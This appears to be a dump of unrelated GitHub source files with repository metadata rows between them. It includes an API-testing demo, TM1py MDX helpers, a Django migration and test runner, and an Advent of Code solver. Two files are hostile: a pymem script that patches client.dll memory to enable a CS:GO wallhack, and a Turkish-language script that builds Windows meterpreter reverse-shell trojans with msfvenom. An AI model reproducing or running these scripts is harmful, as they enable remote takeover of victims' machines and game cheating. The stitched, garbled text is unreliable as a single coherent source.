def fetch_response_headers():
    """Print all response headers plus the Date and Server entries."""
    headers = requests.get(url).headers
    print(headers)
    print(f"Date: {headers.get('Date')}")
    print(f"Server: {headers.get('Server')}")
def fetch_cookies():
    """Print the response headers and the cookie jar of the request."""
    reply = requests.get(url)
    print(reply.headers)
    print(f"Cookies: {reply.cookies}")
def fetch_encoding():
    """Print the response headers and the detected text encoding."""
    # Send request
    response = requests.get(url)
    # print header
    print(response.headers)
    # Fixed label typo: "Enconding" -> "Encoding".
    print(f"Encoding: {response.encoding}")
def fetch_elapsed_time():
    """Print the response headers and the request round-trip time."""
    # Send request
    response = requests.get(url)
    # print header
    print(response.headers)
    # Fixed copy-paste label: the value printed is the elapsed time, not the
    # encoding ("Enconding" in the original).
    print(f"Elapsed: {response.elapsed}")
def validate_response_body_using_jsonpath():
    """Fetch the user list and verify/print selected fields via jsonpath.

    NOTE(review): jsonpath.jsonpath returns a list of matches, or False when
    nothing matches -- the [0] indexing below assumes the API response always
    contains 'total_pages' and 'data'.
    """
    # Send request
    response = requests.get(url)
    json_response = json.loads(response.text)
    # print(f'json_response = {json_response}')
    # print(json.dumps(json_response, indent=4, sort_keys=True))
    #Json path
    pages = jsonpath.jsonpath(json_response, 'total_pages')
    assert pages[0] == 2
    print(pages[0])
    data = jsonpath.jsonpath(json_response, 'data')
    print(f'data = {data[0]}')
    print(f'email = {data[0][0]["email"]}')
    #Fetch firstnames and last names
    for user in data[0]:
        print(f'{user["first_name"]} {user["last_name"]} ({user["email"]})')
if __name__ == '__main__':
    # Demo entry point: only the jsonpath validation runs by default; the
    # other fetch helpers are kept commented out for manual experimentation.
    # get_users()
    # fetch_response_headers()
    # fetch_cookies()
    # fetch_encoding()
    # fetch_elapsed_time()
    validate_response_body_using_jsonpath()
"mosheh.eliyahu@adelaide.edu.au"
] | mosheh.eliyahu@adelaide.edu.au |
ed2e922e9f6f35cdab83e8dbf51e6f36b9a60d16 | 1dca67115a72df834f94bb3022dc31563b56a9ff | /main.py | 37d96f4ac22afd845fedf402a911270f81cd7199 | [
"MIT"
] | permissive | aNOOBisTheGod/csgo-python-hacks | a9c0ddbf20396db3289cb137cc9d255b0dc8e3ce | bd9b0b5101e0ff3f5ccb3988265bb4304416c08a | refs/heads/main | 2023-08-25T02:27:29.465912 | 2021-09-26T10:18:18 | 2021-09-26T10:18:18 | 410,517,660 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | import pymem
import re
def wh(state):
try:
processName = 'csgo.exe'
pm = pymem.Pymem(processName)
client = pymem.process.module_from_name(pm.process_handle,
'client.dll')
clientModule = pm.read_bytes(client.lpBaseOfDll, client.SizeOfImage)
address = client.lpBaseOfDll + re.search(rb'\x83\xF8.\x8B\x45\x08\x0F',
clientModule).start() + 2
pm.write_uchar(address, state)
pm.close_process()
except:
print('something went wrong')
wh(1) # enable the wallhack; call with state 2 to turn it off
| [
"noreply@github.com"
] | noreply@github.com |
6f767590c4e5772ad950cb7ed0b587ce54ac7899 | 844f8a6ea4ca1436ac162c6794663accb3538230 | /TM1py/Utils/MDXUtils.py | 2d82daeb3767aafb189137afb6637cce3cc1f888 | [
"MIT"
] | permissive | rclapp/TM1py | a3d2f82f72cedfa819a68864d6ea0500f7852e69 | 27708441c5b4b6115012ec032d5b4454d90341e5 | refs/heads/master | 2023-08-31T08:17:59.977306 | 2023-08-04T02:46:45 | 2023-08-08T14:51:07 | 136,059,712 | 2 | 2 | MIT | 2023-08-03T17:35:06 | 2018-06-04T17:24:48 | Python | UTF-8 | Python | false | false | 10,016 | py | import warnings
class DimensionSelection:
    """ Instances of this class to be passed to construct_mdx function.

    A selection is specified by exactly one of: an iterable of element
    names, a subset name, or a raw MDX expression; with none given, the
    whole dimension (TM1SubsetAll) is selected.
    """
    # Selection-type discriminators returned by determine_selection_type.
    SUBSET = 1
    EXPRESSION = 2
    ITERABLE = 3

    def __init__(self, dimension_name, elements=None, subset=None, expression=None):
        """Build the MDX set expression for one dimension.

        :param dimension_name: name of the TM1 dimension
        :param elements: iterable of element names (ITERABLE selection)
        :param subset: name of a registered subset (SUBSET selection)
        :param expression: raw MDX set expression (EXPRESSION selection)
        """
        warnings.warn(
            f"class DimensionSelection will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
            DeprecationWarning,
            stacklevel=2)
        self.dimension_name = dimension_name
        self.selection_type = self.determine_selection_type(elements, subset, expression)
        if self.selection_type == self.SUBSET:
            self.expression = curly_braces(expression="Tm1SubsetToSet([{dimension}], '{subset}')".format(
                dimension=dimension_name,
                subset=subset))
        elif self.selection_type == self.EXPRESSION:
            self.expression = curly_braces(expression=expression)
        elif self.selection_type == self.ITERABLE:
            self.expression = curly_braces(expression=",".join(["[{}].[{}]".format(dimension_name, element)
                                                                for element
                                                                in elements]))
        elif not self.selection_type:
            # No selection given -> take all elements of the dimension.
            self.expression = curly_braces(expression="TM1SubsetAll([{dimension}])".format(dimension=dimension_name))

    @staticmethod
    def determine_selection_type(elements=None, subset=None, expression=None):
        """Classify the arguments into ITERABLE / SUBSET / EXPRESSION / None.

        :raise ValueError: if more than one selection argument is provided
        """
        warnings.warn(
            f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
            DeprecationWarning,
            stacklevel=2)
        if elements is not None and subset is None and expression is None:
            return DimensionSelection.ITERABLE
        elif elements is None and subset is not None and expression is None:
            return DimensionSelection.SUBSET
        elif elements is None and subset is None and expression is not None:
            return DimensionSelection.EXPRESSION
        elif elements is None and subset is None and expression is None:
            return None
        else:
            raise ValueError("DimensionSelection constructor takes one type of selection only: "
                             "elements, subset or expression")
def construct_mdx_axis(dim_selections):
    """ Construct MDX for one Axis (Row or Column).
    Can have multiple dimensions stacked.

    :param dim_selections: instances of TM1py.Utils.MDXUtils.DimensionSelection
    :return: a valid MDX for an Axis
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    expressions = [selection.expression for selection in dim_selections]
    return "*".join(expressions)
def construct_mdx(cube_name, rows, columns, contexts=None, suppress=None):
    """ Method to construct MDX Query from different dimension selections.

    :param cube_name: Name of the Cube
    :param rows: List of DimensionSelections
    :param columns: List of DimensionSelections
    :param contexts: Dictionary of Dimensions and Elements (WHERE clause)
    :param suppress: "Both", "Rows", "Columns" or None
    :return: Generated MDX Query
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    # Per-axis NON EMPTY suppression
    suppress_mode = suppress.upper() if suppress else ""
    rows_prefix = "NON EMPTY " if suppress_mode in ("ROWS", "BOTH") else ""
    columns_prefix = "NON EMPTY " if suppress_mode in ("COLUMNS", "BOTH") else ""
    # Context filter (where statement)
    where_clause = ""
    if contexts:
        members = ",".join(
            "[{}].[{}]".format(dim, elem) for dim, elem in contexts.items()
        )
        where_clause = "WHERE (" + members + ")"
    return "SELECT {}{} ON ROWS, {}{} ON COLUMNS FROM [{}] {}".format(
        rows_prefix,
        construct_mdx_axis(rows),
        columns_prefix,
        construct_mdx_axis(columns),
        cube_name,
        where_clause,
    )
def curly_braces(expression):
    """ Wrap an expression in curly braces, avoiding doubled braces.

    :param expression: MDX set expression
    :return: expression guaranteed to start with '{' and end with '}'
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    prefix = "" if expression.startswith("{") else "{"
    suffix = "" if expression.endswith("}") else "}"
    return prefix + expression + suffix
def read_cube_name_from_mdx(mdx):
    """ Read the cube name from a valid MDX Query.

    :param mdx: The MDX Query as String
    :return: String, name of a cube
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    cube_name, _, _, _ = read_dimension_composition_from_mdx(mdx)
    return cube_name
def read_dimension_composition_from_mdx(mdx):
    """ Parse a valid MDX Query into the cube name and the dimension names
    per axis.

    :param mdx: MDX query string
    :return: tuple (cube, rows, columns, titles)
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    rows_part, columns_part, from_part, where_part = split_mdx(mdx)
    # from_part looks like "[CubeName]" -- strip the brackets.
    return (
        from_part[1:-1],
        read_dimension_composition_from_mdx_set_or_tuple(rows_part),
        read_dimension_composition_from_mdx_set_or_tuple(columns_part),
        read_dimension_composition_from_mdx_set_or_tuple(where_part),
    )
def read_dimension_composition_from_mdx_set_or_tuple(mdx):
    """ Dispatch to the set- or tuple-parser depending on the shape of *mdx*.

    :param mdx: an axis or WHERE fragment of an MDX query
    :return: list of dimension names
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    compact = ''.join(mdx.split())
    # empty fragment, e.g. an MDX statement without a WHERE clause
    if not compact:
        return []
    # "{(...)}" tuples on rows/columns, or a bare "(...)" WHERE tuple
    is_braced_tuple = compact[1] == '(' and compact[-2] == ')'
    is_bare_tuple = compact[0] == '(' and compact[-1] == ')'
    if is_braced_tuple or is_bare_tuple:
        return read_dimension_composition_from_mdx_tuple(mdx)
    # otherwise it is a set expression
    return read_dimension_composition_from_mdx_set(mdx)
def read_dimension_composition_from_mdx_set(mdx):
    """ Extract the dimension names from an MDX set expression such as
    "{[Dim1].[e1]} * {[Dim2].[e2]}".

    :param mdx: MDX set fragment
    :return: list of dimension names in order of appearance
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    compact = ''.join(mdx.split())
    names = []
    # Each "}*{" boundary separates one stacked dimension from the next.
    for fragment in compact.split("}*{"):
        opening, closing = fragment.find("["), fragment.find("]")
        names.append(fragment[opening + 1:closing])
    return names
def read_dimension_composition_from_mdx_tuple(mdx):
    """ Extract the dimension names from an MDX tuple such as
    "([Dim1].[a],[Dim2].[b])".  When several tuples are listed, only the
    first full tuple is parsed.

    :param mdx: MDX tuple fragment
    :return: list of dimension names of one tuple
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    names = []
    for member in mdx.split(","):
        opening, closing = member.find("["), member.find("]")
        name = member[opening + 1:closing]
        # a repeated dimension marks the start of the next tuple
        if name in names:
            break
        names.append(name)
    return names
def split_mdx(mdx):
    """ Split an MDX query into its rows, columns, FROM and WHERE parts.

    :param mdx: MDX query string
    :return: tuple (mdx_rows, mdx_columns, mdx_from, mdx_where) with
        whitespace removed
    :raise ValueError: if the query cannot be parsed
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    try:
        mdx_rows, mdx_rest = _find_case_and_space_insensitive_first_occurrence(
            text=mdx,
            pattern_start="{",
            pattern_end="}ONROWS"
        )
        mdx_columns, mdx_rest = _find_case_and_space_insensitive_first_occurrence(
            text=mdx_rest,
            pattern_start="{",
            pattern_end="}ONCOLUMNSFROM"
        )
        mdx_from, mdx_where = _find_case_and_space_insensitive_first_occurrence(
            text=mdx_rest,
            pattern_end="]WHERE"
        )
        return mdx_rows, mdx_columns, mdx_from, mdx_where
    except ValueError as error:
        # Bug fix: the original built the ValueError but never raised it,
        # so a parse failure silently returned None and callers unpacking
        # the result crashed later with an unrelated TypeError.
        raise ValueError("Can't parse mdx: {}".format(mdx)) from error
def _find_case_and_space_insensitive_first_occurrence(text, pattern_start=None, pattern_end=None):
    """Split *text* at the first occurrence of *pattern_end*, matching with
    all whitespace removed and case ignored.

    :param text: text to scan; all whitespace is stripped before matching
    :param pattern_start: optional pattern marking the start of the selection
    :param pattern_end: optional pattern whose first character ends the
        selection (the rest of the pattern is consumed from the remainder)
    :return: tuple (selection, remainder); if neither pattern is found the
        whole text is returned with an empty remainder (e.g. an MDX query
        without a WHERE clause)
    :raise ValueError: if *pattern_end* occurs more than once
    """
    warnings.warn(
        f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
        DeprecationWarning,
        stacklevel=2)
    text_without_spaces = ''.join(text.split())
    text_without_spaces_and_uppercase = text_without_spaces.upper()
    # Normalize the patterns the same way as the text.
    if pattern_start:
        pattern_start = ''.join(pattern_start.split()).upper()
    if pattern_end:
        pattern_end = ''.join(pattern_end.split()).upper()
        if text_without_spaces_and_uppercase.count(pattern_end) > 1:
            raise ValueError("Invalid state. {} has more than 1 occurrences in text: {}".format(pattern_end, text))
    # str.find returns -1 when the pattern is missing.
    pos_start = text_without_spaces_and_uppercase.find(pattern_start) if pattern_start else 0
    pos_end = text_without_spaces_and_uppercase.find(pattern_end) if pattern_end else -1
    # case of mdx statement without where clause
    if pos_start == 0 and pos_end == -1:
        return text, ""
    # Selection includes the first character of pattern_end (e.g. the closing
    # brace of "}ONROWS"); the remainder starts after the full pattern.
    selection = text_without_spaces[pos_start:pos_end + 1]
    text = text_without_spaces[pos_end + len(pattern_end):]
    return selection, text
| [
"MariusWirtz2@gmail.com"
] | MariusWirtz2@gmail.com |
6a3e246b107a66aee8e3ca5850f3ebe6bd36d4db | 1519d8c53539fba7fb9cca62d913546dd9c1f3d7 | /database/hiree_database/database_app/migrations/0007_jobpost_job_active.py | dc448af28a7f9a1e4be2758a08a529a2a009fc95 | [] | no_license | Ashish-3001/HireeDatabase | 86f4b0a8fbdbf79de10e0f4dd731a533e0c7fadb | 91185b95a76513367a37d145cbf245154adb9f04 | refs/heads/master | 2022-11-21T11:47:42.415452 | 2020-07-22T20:31:36 | 2020-07-22T20:31:36 | 272,979,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.5 on 2020-06-11 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the boolean ``job_active`` flag (default True) to ``JobPost`` so
    postings can be deactivated without being deleted."""

    dependencies = [
        ('database_app', '0006_auto_20200611_0142'),
    ]
    operations = [
        migrations.AddField(
            model_name='jobpost',
            name='job_active',
            field=models.BooleanField(default=True),
        ),
    ]
| [
"cvnnashish@gmail.com"
] | cvnnashish@gmail.com |
dc405b8f4c802e4f422a8113af252da208d50723 | 437fa0b3a6f680681450ffee9292098c8b657d3a | /trojanolustur.py | 952ee14483161d2a17c0012643cf704e3fae1bdc | [] | no_license | msgulsever/Cyber-Security-Tools | f4c151240e5417f592526460d17355ee5e99ed4f | 7749bb51bc42a911a52f0038b8c9a327508a0edc | refs/heads/main | 2023-01-21T02:56:05.894363 | 2020-11-22T23:35:08 | 2020-11-22T23:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | #!/usr/bin/env python
import os
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet TROJAN OLUSTURMA")
print("""
Trojan Olusturma Aracina Hosgeldiniz
""")
ip = raw_input("Local veya Dis IP Girin: ")
port = raw_input ("Port Girin: ")
print("""
1)windows/meterpreter/reverse_tcp
2)windows/meterpreter/reverse_http
3)windows/meterpreter/reverse_https
""")
payload = raw_input ("payload No Girin: ")
kayityeri = raw_input ("Kayit yeri girin: ")
if(payload=="1"):
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " -f exe -o " + kayityeri)
if(payload=="2"):
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + ip + " -f exe -o " + kayityeri)
if(payload=="3"):
os.system("msfvenom -p windows/meterpreter/reverse_https LHOST=" + ip + " -f exe -o " + kayityeri)
| [
"noreply@github.com"
] | noreply@github.com |
83ff787ef99d8d4f62ae8fe9bdda0a73c98f6e38 | 1fec79e22fb8edd89c3c1931909eb9b99032e2ae | /11.py | 7cabf563ad3932490bd94630b9127b04133fb7bb | [] | no_license | chrismilleruk/aoc2020py | 589fc464ce93387ba5483de1405e1c9e7a178607 | 6cf94ac6c36c34c4d23e7d90beaaeda9adc348c5 | refs/heads/master | 2023-02-04T09:33:13.802980 | 2020-12-26T19:02:06 | 2020-12-26T19:02:06 | 320,413,577 | 0 | 0 | null | 2020-12-11T18:12:51 | 2020-12-10T23:19:04 | Python | UTF-8 | Python | false | false | 6,312 | py | # Day 11: Seating System
import pytest
import time
# Simulate your seating area by applying the seating rules repeatedly until no seats change state. How many seats end up occupied?
def part1(data, directional = False):
    """Run the seating simulation until no seat changes; return the occupied count.

    data: newline-separated grid of '.', 'L' (empty seat) and '#' (occupied).
    directional: when True, use the line-of-sight rules of part 2.
    The loop is capped at 1000 steps as a safety net against non-convergence.
    (Fix: the original kept a manual ``step`` counter alongside an unused
    ``range`` index; the counter is now the loop variable itself.)
    """
    seating = Seating(data)
    for step in range(1, 1001):
        start = time.perf_counter()
        changed = seating.step(directional)
        elapsed_ms = (time.perf_counter() - start) * 1000  # sec -> ms
        print(f"Step {step} took {round(elapsed_ms)}ms - {seating.count_occupied()} occupied - changed:{changed}")
        if not changed:
            break
    return seating.count_occupied()
# Given the new visibility method and the rule change for occupied seats becoming empty, once equilibrium is reached, how many seats end up occupied?
def part2(data):
    """Part 2: same simulation with line-of-sight neighbours and tolerance 5."""
    return part1(data, True)
class Seating:
    """Grid simulation for AoC 2020 day 11 ("Seating System").

    The grid is a list of strings: '.' floor, 'L' empty seat, '#' occupied.
    Neighbour lists are precomputed once per seat: ``adjacent`` holds the
    up-to-8 touching seats (part 1) and ``directional`` the first seat
    visible along each of the 8 rays (part 2).  Seat positions never
    change between steps, so precomputing against the initial frame is safe.
    """

    def __init__(self, layout):
        self.frame = layout.split('\n')
        self.height = len(self.frame)
        self.width = len(self.frame[0])
        # [x, y] of every seat, in reading order
        self.seats = [[x, y] for y, row in enumerate(self.frame) for x, seat in enumerate(row) if seat == 'L']
        self.adjacent = list(map(self.gen_adjacent, self.seats))
        self.directional = list(map(self.gen_directional, self.seats))

    def gen_adjacent(self, seat):
        """Return the seats in the 8 cells surrounding ``seat`` (clipped at the edges)."""
        [x, y] = seat
        x1, x2, y1, y2 = max(x - 1, 0), min(x + 2, self.width), max(y - 1, 0), min(y + 2, self.height)
        return [[x, y] for x in range(x1, x2) for y in range(y1, y2) if [x, y] != seat and self.frame[y][x] == 'L']

    def gen_directional(self, seat):
        """Return the first seat visible from ``seat`` along each of the 8 rays."""
        [x, y] = seat
        # candidate coordinate sequences per axis: towards 0, constant, towards the far edge
        rx = [list(range(x - 1, -1, -1)), [x] * self.width, list(range(x + 1, self.width, 1))]
        ry = [list(range(y - 1, -1, -1)), [y] * self.height, list(range(y + 1, self.height, 1))]
        # every dx/dy pairing except (constant, constant) = the seat itself;
        # zip truncates each ray at the nearer grid edge
        lines_of_sight = [list(zip(dx, dy)) for dx in rx for dy in ry if not (dx == rx[1] and dy == ry[1])]
        assert len(lines_of_sight) == 8
        seats = []
        for line in lines_of_sight:
            for [x, y] in line:
                if self.frame[y][x] == 'L':
                    seats.append([x, y])
                    break  # only the first seat on the ray is visible
        return seats

    def viz_lines(self, lines):
        """Debug helper: render the given rays as '+' on an empty grid."""
        frame = [list('.' * self.width) for _ in range(self.height)]
        for line in lines:
            for [x, y] in line:
                frame[y][x] = '+'
        return "\n".join(["".join(line) for line in frame])

    def count_occupied(self, seats=None):
        """Count '#' cells among ``seats`` (default: every seat on the grid).

        BUG FIX: the original used ``seats or self.seats``, which silently
        counted the whole grid whenever an *empty* neighbour list was passed
        (e.g. an isolated seat); test against None explicitly instead.
        """
        if seats is None:
            seats = self.seats
        return list(map(lambda seat: self.frame[seat[1]][seat[0]], seats)).count('#')

    def step(self, directional=False):
        """Advance one round of the rules; return True if any seat changed."""
        changes_made = False
        tolerance = 5 if directional else 4  # part 2 tolerates one more neighbour
        next_frame = [list('.' * self.width) for _ in range(self.height)]
        for ([x, y], adjacent) in zip(self.seats, self.directional if directional else self.adjacent):
            occupied = self.count_occupied(adjacent)
            # empty seat with no occupied neighbours becomes occupied
            if self.frame[y][x] == 'L' and occupied == 0:
                next_frame[y][x] = '#'
                changes_made = True
            # occupied seat with too many occupied neighbours empties out
            elif self.frame[y][x] == '#' and occupied >= tolerance:
                next_frame[y][x] = 'L'
                changes_made = True
            # otherwise the seat keeps its state
            else:
                next_frame[y][x] = self.frame[y][x]
        self.frame = ["".join(line) for line in next_frame]
        return changes_made
# At this point, something interesting happens: the chaos stabilizes and further applications of these rules cause no seats to change state! Once people stop moving around, you count 37 occupied seats.
def test_part1(example1):
    """Part 1 worked example: the grid stabilises with 37 occupied seats."""
    assert part1(example1) == 37
def test_seating_step(example1):
seating = Seating(example1)
assert seating.frame == example1.split('\n')
seating.step()
assert seating.frame == """#.##.##.##
#######.##
#.#.#..#..
####.##.##
#.##.##.##
#.#####.##
..#.#.....
##########
#.######.#
#.#####.##""".split('\n')
seating.step()
assert seating.frame == """#.LL.L#.##
#LLLLLL.L#
L.L.L..L..
#LLL.LL.L#
#.LL.LL.LL
#.LLLL#.##
..L.L.....
#LLLLLLLL#
#.LLLLLL.L
#.#LLLL.##""".split('\n')
seating.step()
assert seating.frame == """#.##.L#.##
#L###LL.L#
L.#.#..#..
#L##.##.L#
#.##.LL.LL
#.###L#.##
..#.#.....
#L######L#
#.LL###L.L
#.#L###.##""".split('\n')
seating.step()
assert seating.frame == """#.#L.L#.##
#LLL#LL.L#
L.L.L..#..
#LLL.##.L#
#.LL.LL.LL
#.LL#L#.##
..L.L.....
#L#LLLL#L#
#.LLLLLL.L
#.#L#L#.##""".split('\n')
seating.step()
assert seating.frame == """#.#L.L#.##
#LLL#LL.L#
L.#.L..#..
#L##.##.L#
#.#L.LL.LL
#.#L#L#.##
..L.L.....
#L#L##L#L#
#.LLLLLL.L
#.#L#L#.##""".split('\n')
def test_seating_gen_directional(example1):
    """First visible seat along each ray, checked for two corner/edge seats."""
    seating = Seating(example1)
    assert seating.gen_directional([0,0]) == [[0,1], [2,0], [1,1]]
    assert seating.gen_directional([6,0]) == [[5,0], [5,1], [6, 1], [8,0], [9,3]]
def _test_seating_step2(example1):
seating = Seating(example1)
assert seating.frame == example1.split('\n')
seating.step(True)
assert seating.frame == """#.##.##.##
#######.##
#.#.#..#..
####.##.##
#.##.##.##
#.#####.##
..#.#.....
##########
#.######.#
#.#####.##""".split('\n')
seating.step(True)
assert seating.frame == """#.LL.LL.L#
#LLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLL#
#.LLLLLL.L
#.LLLLL.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.##.L#
#L#####.LL
L.#.#..#..
##L#.##.##
#.##.#L.##
#.#####.#L
..#.#.....
LLL####LL#
#.L#####.L
#.L####.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##LL.LL.L#
L.LL.LL.L#
#.LLLLL.LL
..L.L.....
LLLLLLLLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##L#.#L.L#
L.L#.#L.L#
#.L####.LL
..#.#.....
LLL###LLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
seating.step(True)
assert seating.frame == """#.L#.L#.L#
#LLLLLL.LL
L.L.L..#..
##L#.#L.L#
L.L#.LL.L#
#.LLLL#.LL
..#.L.....
LLL###LLL#
#.LLLLL#.L
#.L#LL#.L#""".split('\n')
@pytest.fixture
def example1():
    """Example seat layout from the day 11 puzzle statement (10x10 grid)."""
    return """L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL"""
| [
"chrismilleruk@gmail.com"
] | chrismilleruk@gmail.com |
270f7c2b9a37a22f4f90d4b09ed14dadcab2e1e0 | c0aa7b314cf9d85cb3e42173614aaa9fb5576eaf | /tp/plugins/task_runner.py | 15b005ed16519a82b166e3bc56b8352d65bd4ac4 | [] | no_license | shaphan007/testplatform | 8ae5d2cea0d252da2d8348f2e284966c8ddde273 | 3e010e0f9f0669cf5d6f1f5a6dd9ee9396bf388a | refs/heads/master | 2023-06-10T08:41:06.221870 | 2021-06-22T03:15:52 | 2021-06-22T03:15:52 | 375,654,443 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 5,137 | py | # coding=gbk
# api 执行相关
import requests
from .status_conf import StatusConf
from ..models import Step, Case, Plan, Result
from datetime import datetime
import json
class ApiRunner():
    """Executes one HTTP API step against a test environment.

    The outcome is recorded on the instance: ``self.resp`` (requests
    Response or None), ``self.status`` (a StatusConf.step_status value)
    and ``self.error`` (diagnostic text on failure).
    """

    def __init__(self, ip, port):
        self.host = f'http://{ip}:{port}'
        # BUG FIX: the original print used a plain string literal, so it
        # printed "{self.host}" verbatim instead of the interpolated value.
        print(f'host:{self.host}')

    # Execute the API call described by ``api``.
    def exec_api(self, api):
        """Fire the HTTP request for ``api``.

        :param api: an HttpApi model instance exposing ``path``, ``method``,
            ``content_type`` and ``data``.
        On exception, ``self.status`` is set to the error state and the
        exception text is stored in ``self.error``.
        """
        self.resp = None
        try:
            self.url = self.host + api.path
            method = StatusConf.http_method[api.method]
            content_type = StatusConf.content_types[api.content_type]
            print(f"self.url:{self.url}")
            print(f"method:{method}")
            print(f"content_type:{content_type}")
            # post/put carry a request body; the encoding follows content_type
            if method in ['post', 'put']:
                if content_type == 'application/json':
                    self.resp = requests.request(method, self.url, json=json.loads(api.data))
                elif content_type == 'application/x-www-form-urlencoded':
                    self.resp = requests.request(method, self.url, data=api.data)
                else:
                    # unsupported content type
                    return {'msg': '请求暂时不支持'}
            else:
                # get / delete style requests
                self.resp = requests.request(method, self.url, data=api.data)
        except Exception as e:
            self.status = StatusConf.step_status.error
            self.error = repr(e)  # keep the exception text for reporting
            print(f"步骤执行异常:{self.error}")

    # Compare the actual response body with the expected text.
    def check_result(self, expect):
        """Set ``self.status`` to success/failed by comparing ``expect``
        against the response body."""
        # BUG FIX: ``if self.resp:`` is False for 4xx/5xx responses because
        # requests.Response truthiness follows the status code; compare
        # against None so failed responses are still checked.
        if self.resp is not None:
            print(f'self.resp.text:{self.resp.text}')
            if expect == self.resp.text:
                self.status = StatusConf.step_status.success
            else:
                self.status = StatusConf.step_status.failed
                # BUG FIX: the original read ``self.resp.txt`` and raised
                # AttributeError whenever an assertion failed.
                self.error = f'{expect} not equal {self.resp.text}'
# Step execution
def step_run(step_id, test_env):
    """Run a single test step against an environment and persist its status.

    :param step_id: primary key of the Step to execute
    :param test_env: environment object providing ``ip`` and ``port``
    :returns: dict with ``recode`` / ``msg`` / ``status``
    """
    ip = test_env.ip
    port = test_env.port
    target_step = Step.objects.get(pk=step_id)  # load the test step
    target_api = target_step.httpapi  # the HTTP API attached to this step
    # mark the step as running before firing the request
    target_step.status = StatusConf.step_status.running
    print(f"target_step.status:{target_step.status}")
    target_step.save()
    # fire the API call
    print(f'执行步骤')
    # FIX: construct the runner outside the try block so the status update
    # below can never hit an unbound local (the original raised NameError
    # when ApiRunner construction itself failed).
    api_runner = ApiRunner(ip, port)
    try:
        api_runner.exec_api(target_api)
        api_runner.check_result(target_step.expected)
    except Exception as e:
        print(f'用例步骤执行失败:{repr(e)}')
    # FIX: fall back to the error state when the runner never got far enough
    # to set a status (the original raised AttributeError in that case).
    target_step.status = getattr(api_runner, 'status', StatusConf.step_status.error)
    target_step.save()
    return {'recode': 200, 'msg': '执行完成', 'status': target_step.status}
# Case execution: run every step of one test case, stopping at the first failure.
def case_run(case_id, test_env):
    """Execute all steps of case ``case_id`` against ``test_env``.

    :returns: dict with ``recode`` / ``msg`` / ``status``; execution stops
        at the first step that does not succeed.
    """
    target_case = Case.objects.get(pk=case_id)
    step_list = target_case.step_set.all()  # reverse lookup: all steps of this case
    # run the steps in order
    for step in step_list:
        print(f"step:{step}")
        res = step_run(step.id, test_env)
        print(f"status:{res['status']}")
        if res['status'] != StatusConf.step_status.success:
            return {'recode': 500, 'msg': '运行中断', 'status': 'failed'}
    return {'recode': 200, 'msg': '运行结束', 'status': 'success'}
# Plan execution: run every case of a plan and record the aggregate result.
def plan_run(request):
    """Execute every case in the plan given by ``request.GET['id']``.

    Updates the plan's status/executor/exec_counts, stores a Result row with
    the pass/fail tally, and returns a summary dict.
    """
    plan_id = request.GET.get('id')
    target_plan = Plan.objects.get(pk=plan_id)
    # start of plan execution
    print("开始执行计划")
    start_time = datetime.now()
    target_plan.status = StatusConf.plan_status.running  # mark as running
    target_plan.save()
    # run every case attached to this plan
    case_list = target_plan.cases.all()
    # tally of case outcomes
    case_num = case_list.count()
    pass_num = 0
    failed_num = 0
    for case in case_list:
        print(f"case:{case}")
        res = case_run(case.id, test_env=target_plan.environment)
        if res['status'] == 'success':
            pass_num += 1
        else:
            failed_num += 1
    print("用例执行计划结束")
    # record the finish time
    end_time = datetime.now()
    # mark the plan as done
    target_plan.status = StatusConf.plan_status.done
    # bump the execution counter
    target_plan.exec_counts += 1
    # record who ran it
    target_plan.executor = request.user
    target_plan.save()
    # persist this run's outcome as a Result row
    Result.objects.create(plan=target_plan, start_time=start_time, end_time=end_time, case_num=case_num,
                          pass_num=pass_num, failed_num=failed_num, executor=request.user)
    return {'recode': 200, 'msg': '运行结束', 'status': target_plan.status, 'case_num': case_num, 'pass_num': pass_num,
            'failed_num': failed_num}
| [
"1304832882@qq.com"
] | 1304832882@qq.com |
